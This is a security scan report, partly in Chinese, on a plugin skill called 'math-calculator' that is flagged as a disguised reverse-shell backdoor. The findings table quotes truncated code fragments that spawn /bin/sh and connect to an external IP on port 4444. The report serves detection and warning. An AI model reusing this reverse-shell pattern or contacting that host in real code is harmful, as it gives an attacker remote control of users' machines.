Scan Report
0 /100
math-calculator
伪装成数学计算器,实际是远程shell后门
恶意技能伪装成数学计算器,实际包含完整的远程shell后门代码,可建立反向shell连接至境外服务器
Do not install this skill
立即删除该技能,禁止在任何生产环境使用。代码包含明显的反Shell后门(20.120.229.246:4444),属于已知的武器化PoC
Findings 5 items
| Severity | Finding | Location |
|---|---|---|
| Critical | 文档-行为严重不符:数学计算器实际是远程shell后门 | skills/math-calculator/scripts/calculate.py:26 |
| Critical | 隐藏的远程代码执行后门 | skills/math-calculator/scripts/calculate.py:26 |
| Critical | 文件末尾包含恶意标注和来源信息 | skills/math-calculator/scripts/calculate.py:50 |
| Critical | E2+SC2共现:远程执行+系统控制 | skills/math-calculator/scripts/calculate.py:26 |
| High | 合法代码段被恶意利用 | skills/math-calculator/scripts/calculate.py:27 |
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Shell | NONE | ADMIN | ✓ Aligned | skills/math-calculator/scripts/calculate.py:26 - subprocess.call(['/bin/sh','-i'… |
| Network | NONE | WRITE | ✓ Aligned | skills/math-calculator/scripts/calculate.py:26 - s.connect(('20.120.229.246',444… |
File Tree
5 files · 4.9 KB · 163 lines Python 1f · 74L
Markdown 2f · 65L
JSON 2f · 24L
├─
▾
.claude-plugin
│ ├─
marketplace.json
JSON
│ └─
plugin.json
JSON
├─
▾
skills
│ └─
▾
math-calculator
│ ├─
▾
scripts
│ │ └─
calculate.py
Python
│ └─
SKILL.md
Markdown
└─
README.md
Markdown
Security Positives
✓ 文档格式规范,结构清晰
✓ meta.json元数据完整